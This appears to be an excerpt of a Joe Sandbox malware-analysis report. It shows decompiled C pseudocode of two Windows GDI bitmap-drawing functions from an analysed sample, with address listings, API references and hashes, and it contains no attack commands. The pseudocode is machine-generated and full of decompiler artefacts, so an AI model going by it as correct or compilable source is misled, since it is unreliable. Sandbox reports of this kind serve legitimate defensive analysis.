                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E0042A510(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				struct HDC__* _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                            				signed int _v37;
                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                            				void* _v48;
                                                                                                                                                                                                                            				struct HDC__* _v52;
                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                            				intOrPtr* _v60;
                                                                                                                                                                                                                            				intOrPtr* _v64;
                                                                                                                                                                                                                            				short _v66;
                                                                                                                                                                                                                            				short _v68;
                                                                                                                                                                                                                            				signed short _v70;
                                                                                                                                                                                                                            				signed short _v72;
                                                                                                                                                                                                                            				void* _v76;
                                                                                                                                                                                                                            				intOrPtr _v172;
                                                                                                                                                                                                                            				char _v174;
                                                                                                                                                                                                                            				intOrPtr _t150;
                                                                                                                                                                                                                            				signed int _t160;
                                                                                                                                                                                                                            				intOrPtr _t163;
                                                                                                                                                                                                                            				void* _t166;
                                                                                                                                                                                                                            				void* _t174;
                                                                                                                                                                                                                            				void* _t183;
                                                                                                                                                                                                                            				signed int _t188;
                                                                                                                                                                                                                            				intOrPtr _t189;
                                                                                                                                                                                                                            				struct HDC__* _t190;
                                                                                                                                                                                                                            				struct HDC__* _t204;
                                                                                                                                                                                                                            				signed int _t208;
                                                                                                                                                                                                                            				signed short _t214;
                                                                                                                                                                                                                            				intOrPtr _t241;
                                                                                                                                                                                                                            				intOrPtr* _t245;
                                                                                                                                                                                                                            				intOrPtr _t251;
                                                                                                                                                                                                                            				intOrPtr _t289;
                                                                                                                                                                                                                            				intOrPtr _t290;
                                                                                                                                                                                                                            				intOrPtr _t295;
                                                                                                                                                                                                                            				signed int _t297;
                                                                                                                                                                                                                            				signed int _t317;
                                                                                                                                                                                                                            				void* _t319;
                                                                                                                                                                                                                            				void* _t320;
                                                                                                                                                                                                                            				signed int _t321;
                                                                                                                                                                                                                            				void* _t322;
                                                                                                                                                                                                                            				void* _t323;
                                                                                                                                                                                                                            				void* _t324;
                                                                                                                                                                                                                            				intOrPtr _t325;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t316 = __edi;
                                                                                                                                                                                                                            				_t323 = _t324;
                                                                                                                                                                                                                            				_t325 = _t324 + 0xffffff54;
                                                                                                                                                                                                                            				_t319 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_v52 = 0;
                                                                                                                                                                                                                            				_v44 = 0;
                                                                                                                                                                                                                            				_v60 = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
                                                                                                                                                                                                                            				_v37 = _v36 == 0xc;
                                                                                                                                                                                                                            				if(_v37 != 0) {
                                                                                                                                                                                                                            					_v36 = 0x28;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v28 = E0040275C(_v36 + 0x40c);
                                                                                                                                                                                                                            				_v64 = _v28;
                                                                                                                                                                                                                            				_push(_t323);
                                                                                                                                                                                                                            				_push(0x42aa2d);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t325;
                                                                                                                                                                                                                            				_push(_t323);
                                                                                                                                                                                                                            				_push(0x42aa00);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t325;
                                                                                                                                                                                                                            				if(_v37 == 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v12 + 0xc))();
                                                                                                                                                                                                                            					_t320 = _t319 - _v36;
                                                                                                                                                                                                                            					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                                                                                                                                                                                                            					if(_t150 != 3 && _t150 != 0) {
                                                                                                                                                                                                                            						_v60 = E00403BBC(1);
                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                            							E004032B4( &_v174, 0xe);
                                                                                                                                                                                                                            							_v174 = 0x4d42;
                                                                                                                                                                                                                            							_v172 = _v36 + _t320;
                                                                                                                                                                                                                            							_a4 =  &_v174;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v60 + 0x10))();
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v60 + 0x10))();
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v60 + 0x10))();
                                                                                                                                                                                                                            						E0041D93C(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v60 + 0x14))();
                                                                                                                                                                                                                            						_v12 = _v60;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v12 + 0xc))();
                                                                                                                                                                                                                            					_t251 = _v64;
                                                                                                                                                                                                                            					E004032B4(_t251, 0x28);
                                                                                                                                                                                                                            					_t241 = _t251;
                                                                                                                                                                                                                            					 *(_t241 + 4) = _v72 & 0x0000ffff;
                                                                                                                                                                                                                            					 *(_t241 + 8) = _v70 & 0x0000ffff;
                                                                                                                                                                                                                            					 *((short*)(_t241 + 0xc)) = _v68;
                                                                                                                                                                                                                            					 *((short*)(_t241 + 0xe)) = _v66;
                                                                                                                                                                                                                            					_t320 = _t319 - 0xc;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t245 = _v64;
                                                                                                                                                                                                                            				 *_t245 = _v36;
                                                                                                                                                                                                                            				_v32 = _v28 + _v36;
                                                                                                                                                                                                                            				if( *((short*)(_t245 + 0xc)) != 1) {
                                                                                                                                                                                                                            					E00425F40();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v36 == 0x28) {
                                                                                                                                                                                                                            					_t214 =  *(_t245 + 0xe);
                                                                                                                                                                                                                            					if(_t214 == 0x10 || _t214 == 0x20) {
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
                                                                                                                                                                                                                            							E0041D8CC(_v12, 0xc, _v32);
                                                                                                                                                                                                                            							_v32 = _v32 + 0xc;
                                                                                                                                                                                                                            							_t320 = _t320 - 0xc;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *(_t245 + 0x20) == 0) {
                                                                                                                                                                                                                            					 *(_t245 + 0x20) = E004261D0( *(_t245 + 0xe));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t317 = _v37 & 0x000000ff;
                                                                                                                                                                                                                            				_t257 =  *(_t245 + 0x20) * 0;
                                                                                                                                                                                                                            				E0041D8CC(_v12,  *(_t245 + 0x20) * 0, _v32);
                                                                                                                                                                                                                            				_t321 = _t320 -  *(_t245 + 0x20) * 0;
                                                                                                                                                                                                                            				if( *(_t245 + 0x14) == 0) {
                                                                                                                                                                                                                            					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
                                                                                                                                                                                                                            					_t208 = E004261F0( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                            					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                                                                                                                                                                                                            					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t160 =  *(_t245 + 0x14);
                                                                                                                                                                                                                            				if(_t321 > _t160) {
                                                                                                                                                                                                                            					_t321 = _t160;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v37 != 0) {
                                                                                                                                                                                                                            					_t160 = E00426498(_v32);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_v16 = E00426060(_t160);
                                                                                                                                                                                                                            				_push(_t323);
                                                                                                                                                                                                                            				_push(0x42a97b);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t325;
                                                                                                                                                                                                                            				_t163 =  *((intOrPtr*)(_v64 + 0x10));
                                                                                                                                                                                                                            				if(_t163 == 0 || _t163 == 3) {
                                                                                                                                                                                                                            					if( *0x49b620 == 0) {
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push( &_v24);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(_v28);
                                                                                                                                                                                                                            						_t166 = _v16;
                                                                                                                                                                                                                            						_push(_t166);
                                                                                                                                                                                                                            						L004072E8();
                                                                                                                                                                                                                            						_v44 = _t166;
                                                                                                                                                                                                                            						if(_v44 == 0 || _v24 == 0) {
                                                                                                                                                                                                                            							if(GetLastError() != 0) {
                                                                                                                                                                                                                            								E0040E79C(_t245, _t257, _t317, _t321);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E00425F40();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_push(_t323);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t325;
                                                                                                                                                                                                                            						E0041D8CC(_v12, _t321, _v24);
                                                                                                                                                                                                                            						_pop(_t289);
                                                                                                                                                                                                                            						 *[fs:eax] = _t289;
                                                                                                                                                                                                                            						_t290 = 0x42a94a;
                                                                                                                                                                                                                            						 *[fs:eax] = _t290;
                                                                                                                                                                                                                            						_push(0x42a982);
                                                                                                                                                                                                                            						_t174 = _v16;
                                                                                                                                                                                                                            						_push(_t174);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						L00407888();
                                                                                                                                                                                                                            						return _t174;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					L27:
                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                            					_v24 = E0040275C(_t321);
                                                                                                                                                                                                                            					_push(_t323);
                                                                                                                                                                                                                            					_push(0x42a8e3);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t325;
                                                                                                                                                                                                                            					_t263 = _t321;
                                                                                                                                                                                                                            					E0041D8CC(_v12, _t321, _v24);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_v20 = E00426060(_v16);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_t183 = _v16;
                                                                                                                                                                                                                            					_push(_t183);
                                                                                                                                                                                                                            					L004072D8();
                                                                                                                                                                                                                            					_v48 = SelectObject(_v20, _t183);
                                                                                                                                                                                                                            					_v56 = 0;
                                                                                                                                                                                                                            					_t188 =  *(_v64 + 0x20);
                                                                                                                                                                                                                            					if(_t188 > 0) {
                                                                                                                                                                                                                            						_t263 = _t188;
                                                                                                                                                                                                                            						_v52 = E00426750(0, _t188);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(_v52);
                                                                                                                                                                                                                            						_t204 = _v20;
                                                                                                                                                                                                                            						_push(_t204);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            						_v56 = _t204;
                                                                                                                                                                                                                            						_push(_v20);
                                                                                                                                                                                                                            						L00407418();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t323);
                                                                                                                                                                                                                            					_push(0x42a8b7);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t325;
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t189 = _v28;
                                                                                                                                                                                                                            					_push(_t189);
                                                                                                                                                                                                                            					_push(_v24);
                                                                                                                                                                                                                            					_push(4);
                                                                                                                                                                                                                            					_push(_t189);
                                                                                                                                                                                                                            					_t190 = _v20;
                                                                                                                                                                                                                            					_push(_t190);
                                                                                                                                                                                                                            					L004072F0();
                                                                                                                                                                                                                            					_v44 = _t190;
                                                                                                                                                                                                                            					if(_v44 == 0) {
                                                                                                                                                                                                                            						if(GetLastError() != 0) {
                                                                                                                                                                                                                            							E0040E79C(_t245, _t263, _t317, _t321);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E00425F40();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t295);
                                                                                                                                                                                                                            					 *[fs:eax] = _t295;
                                                                                                                                                                                                                            					_push(0x42a8be);
                                                                                                                                                                                                                            					if(_v56 != 0) {
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_push(_v56);
                                                                                                                                                                                                                            						_push(_v20);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return DeleteObject(SelectObject(_v20, _v48));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}




















































                                                                                                                                                                                                                            0x0042a7d6
                                                                                                                                                                                                                            0x0042a7de
                                                                                                                                                                                                                            0x0042a7df
                                                                                                                                                                                                                            0x0042a7e9
                                                                                                                                                                                                                            0x0042a7ec
                                                                                                                                                                                                                            0x0042a7ee
                                                                                                                                                                                                                            0x0042a7f0
                                                                                                                                                                                                                            0x0042a7f3
                                                                                                                                                                                                                            0x0042a7f4
                                                                                                                                                                                                                            0x0042a803
                                                                                                                                                                                                                            0x0042a808
                                                                                                                                                                                                                            0x0042a80e
                                                                                                                                                                                                                            0x0042a813
                                                                                                                                                                                                                            0x0042a815
                                                                                                                                                                                                                            0x0042a821
                                                                                                                                                                                                                            0x0042a824
                                                                                                                                                                                                                            0x0042a829
                                                                                                                                                                                                                            0x0042a82a
                                                                                                                                                                                                                            0x0042a82d
                                                                                                                                                                                                                            0x0042a82e
                                                                                                                                                                                                                            0x0042a833
                                                                                                                                                                                                                            0x0042a839
                                                                                                                                                                                                                            0x0042a83a
                                                                                                                                                                                                                            0x0042a83a
                                                                                                                                                                                                                            0x0042a841
                                                                                                                                                                                                                            0x0042a842
                                                                                                                                                                                                                            0x0042a847
                                                                                                                                                                                                                            0x0042a84a
                                                                                                                                                                                                                            0x0042a84d
                                                                                                                                                                                                                            0x0042a84f
                                                                                                                                                                                                                            0x0042a852
                                                                                                                                                                                                                            0x0042a856
                                                                                                                                                                                                                            0x0042a857
                                                                                                                                                                                                                            0x0042a859
                                                                                                                                                                                                                            0x0042a85a
                                                                                                                                                                                                                            0x0042a85d
                                                                                                                                                                                                                            0x0042a85e
                                                                                                                                                                                                                            0x0042a863
                                                                                                                                                                                                                            0x0042a86a
                                                                                                                                                                                                                            0x0042a873
                                                                                                                                                                                                                            0x0042a87c
                                                                                                                                                                                                                            0x0042a875
                                                                                                                                                                                                                            0x0042a875
                                                                                                                                                                                                                            0x0042a875
                                                                                                                                                                                                                            0x0042a873
                                                                                                                                                                                                                            0x0042a883
                                                                                                                                                                                                                            0x0042a886
                                                                                                                                                                                                                            0x0042a889
                                                                                                                                                                                                                            0x0042a892
                                                                                                                                                                                                                            0x0042a894
                                                                                                                                                                                                                            0x0042a899
                                                                                                                                                                                                                            0x0042a89d
                                                                                                                                                                                                                            0x0042a89e
                                                                                                                                                                                                                            0x0042a89e
                                                                                                                                                                                                                            0x0042a8b6
                                                                                                                                                                                                                            0x0042a8b6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,00000000,0042AA2D,?,?), ref: 0042A77A
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7DF
                                                                                                                                                                                                                            • 73C9A520.GDI32(00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7F4
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042A7FE
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000), ref: 0042A82E
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B), ref: 0042A83A
                                                                                                                                                                                                                            • 73C9A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A85E
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A86C
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,000000FF,0042A8BE,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042A89E
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042A8AB
                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0042A8B1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                                                                                                                                                                                            • String ID: ($BM
                                                                                                                                                                                                                            • API String ID: 3415089252-2980357723
                                                                                                                                                                                                                            • Opcode ID: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                                                                                                                                                                                            • Instruction ID: 25b6b903fc63a4d1ab3304e11741f41bc99333438c5c48279b365a0d6610163c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D14C74F002189FDB04EFA9D885BAEBBB5FF48304F54846AE904E7391D7389851CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                                            			E00429C0C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				struct tagPOINT _v21;
                                                                                                                                                                                                                            				struct HDC__* _v28;
                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                                                                            				struct HDC__* _t80;
                                                                                                                                                                                                                            				signed int _t82;
                                                                                                                                                                                                                            				signed int _t83;
                                                                                                                                                                                                                            				signed int _t84;
                                                                                                                                                                                                                            				char _t85;
                                                                                                                                                                                                                            				void* _t92;
                                                                                                                                                                                                                            				struct HDC__* _t115;
                                                                                                                                                                                                                            				void* _t136;
                                                                                                                                                                                                                            				struct HDC__* _t160;
                                                                                                                                                                                                                            				intOrPtr* _t164;
                                                                                                                                                                                                                            				intOrPtr _t172;
                                                                                                                                                                                                                            				intOrPtr _t176;
                                                                                                                                                                                                                            				intOrPtr _t178;
                                                                                                                                                                                                                            				intOrPtr _t180;
                                                                                                                                                                                                                            				int* _t184;
                                                                                                                                                                                                                            				intOrPtr _t186;
                                                                                                                                                                                                                            				void* _t188;
                                                                                                                                                                                                                            				void* _t189;
                                                                                                                                                                                                                            				intOrPtr _t190;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t165 = __ecx;
                                                                                                                                                                                                                            				_t188 = _t189;
                                                                                                                                                                                                                            				_t190 = _t189 + 0xffffffe4;
                                                                                                                                                                                                                            				_t184 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t164 = __eax;
                                                                                                                                                                                                                            				_t186 =  *((intOrPtr*)(__eax + 0x28));
                                                                                                                                                                                                                            				_t172 =  *0x429e58; // 0xf
                                                                                                                                                                                                                            				E00425D3C(_v8, __ecx, _t172);
                                                                                                                                                                                                                            				E0042A288(_t164);
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_v13 = 0;
                                                                                                                                                                                                                            				_t78 =  *((intOrPtr*)(_t186 + 0x10));
                                                                                                                                                                                                                            				if(_t78 != 0) {
                                                                                                                                                                                                                            					_push(0xffffffff);
                                                                                                                                                                                                                            					_push(_t78);
                                                                                                                                                                                                                            					_t160 =  *(_v8 + 4);
                                                                                                                                                                                                                            					_push(_t160);
                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            					_v12 = _t160;
                                                                                                                                                                                                                            					_push( *(_v8 + 4));
                                                                                                                                                                                                                            					L00407418();
                                                                                                                                                                                                                            					_v13 = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                                                            				_t80 =  *(_v8 + 4);
                                                                                                                                                                                                                            				_push(_t80);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				_push(_t80);
                                                                                                                                                                                                                            				_push(0xe);
                                                                                                                                                                                                                            				_t82 =  *(_v8 + 4);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				_t83 = _t82;
                                                                                                                                                                                                                            				_t84 = _t83 * _t82;
                                                                                                                                                                                                                            				if(_t84 > 8) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					_t85 = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
                                                                                                                                                                                                                            					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
                                                                                                                                                                                                                            						_t85 = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t85 == 0) {
                                                                                                                                                                                                                            					if(E00429F98(_t164) == 0) {
                                                                                                                                                                                                                            						SetStretchBltMode(E00425C68(_v8), 3);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                                                                                                                                                                                                            					SetStretchBltMode( *(_v8 + 4), 4);
                                                                                                                                                                                                                            					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t188);
                                                                                                                                                                                                                            				_push(0x429e48);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t190;
                                                                                                                                                                                                                            				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
                                                                                                                                                                                                                            					E0042A228(_t164, _t165);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t92 = E00429EDC(_t164);
                                                                                                                                                                                                                            				_t176 =  *0x429e58; // 0xf
                                                                                                                                                                                                                            				E00425D3C(_t92, _t165, _t176);
                                                                                                                                                                                                                            				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
                                                                                                                                                                                                                            					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E00429EDC(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
                                                                                                                                                                                                                            					_pop(_t178);
                                                                                                                                                                                                                            					 *[fs:eax] = _t178;
                                                                                                                                                                                                                            					_push(0x429e4f);
                                                                                                                                                                                                                            					if(_v13 != 0) {
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                            						_t115 =  *(_v8 + 4);
                                                                                                                                                                                                                            						_push(_t115);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            						return _t115;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                            					_v28 = 0;
                                                                                                                                                                                                                            					_push(_t188);
                                                                                                                                                                                                                            					_push(0x429ddd);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t190;
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_v28 = E00426060(0);
                                                                                                                                                                                                                            					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
                                                                                                                                                                                                                            					E00426204( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E00429EDC(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
                                                                                                                                                                                                                            					_t136 = 0;
                                                                                                                                                                                                                            					_t180 = 0;
                                                                                                                                                                                                                            					 *[fs:eax] = _t180;
                                                                                                                                                                                                                            					_push(0x429e22);
                                                                                                                                                                                                                            					if(_v32 != 0) {
                                                                                                                                                                                                                            						_t136 = SelectObject(_v28, _v32);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_v28 != 0) {
                                                                                                                                                                                                                            						return DeleteDC(_v28);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return _t136;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





























                                                                                                                                                                                                                            0x00429c9a
                                                                                                                                                                                                                            0x00429ca4
                                                                                                                                                                                                                            0x00429ce7
                                                                                                                                                                                                                            0x00429cf4
                                                                                                                                                                                                                            0x00429cf4
                                                                                                                                                                                                                            0x00429ca6
                                                                                                                                                                                                                            0x00429cb1
                                                                                                                                                                                                                            0x00429cbf
                                                                                                                                                                                                                            0x00429cd7
                                                                                                                                                                                                                            0x00429cd7
                                                                                                                                                                                                                            0x00429cfb
                                                                                                                                                                                                                            0x00429cfc
                                                                                                                                                                                                                            0x00429d01
                                                                                                                                                                                                                            0x00429d04
                                                                                                                                                                                                                            0x00429d10
                                                                                                                                                                                                                            0x00429d14
                                                                                                                                                                                                                            0x00429d14
                                                                                                                                                                                                                            0x00429d1b
                                                                                                                                                                                                                            0x00429d20
                                                                                                                                                                                                                            0x00429d26
                                                                                                                                                                                                                            0x00429d34
                                                                                                                                                                                                                            0x00429e1d
                                                                                                                                                                                                                            0x00429e24
                                                                                                                                                                                                                            0x00429e27
                                                                                                                                                                                                                            0x00429e2a
                                                                                                                                                                                                                            0x00429e33
                                                                                                                                                                                                                            0x00429e35
                                                                                                                                                                                                                            0x00429e3a
                                                                                                                                                                                                                            0x00429e3e
                                                                                                                                                                                                                            0x00429e41
                                                                                                                                                                                                                            0x00429e42
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00429e42
                                                                                                                                                                                                                            0x00429e47
                                                                                                                                                                                                                            0x00429d3a
                                                                                                                                                                                                                            0x00429d3c
                                                                                                                                                                                                                            0x00429d41
                                                                                                                                                                                                                            0x00429d46
                                                                                                                                                                                                                            0x00429d47
                                                                                                                                                                                                                            0x00429d4c
                                                                                                                                                                                                                            0x00429d4f
                                                                                                                                                                                                                            0x00429d54
                                                                                                                                                                                                                            0x00429d5e
                                                                                                                                                                                                                            0x00429d6e
                                                                                                                                                                                                                            0x00429da8
                                                                                                                                                                                                                            0x00429dad
                                                                                                                                                                                                                            0x00429daf
                                                                                                                                                                                                                            0x00429db2
                                                                                                                                                                                                                            0x00429db5
                                                                                                                                                                                                                            0x00429dbe
                                                                                                                                                                                                                            0x00429dc8
                                                                                                                                                                                                                            0x00429dc8
                                                                                                                                                                                                                            0x00429dd1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00429dd7
                                                                                                                                                                                                                            0x00429ddc
                                                                                                                                                                                                                            0x00429ddc

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
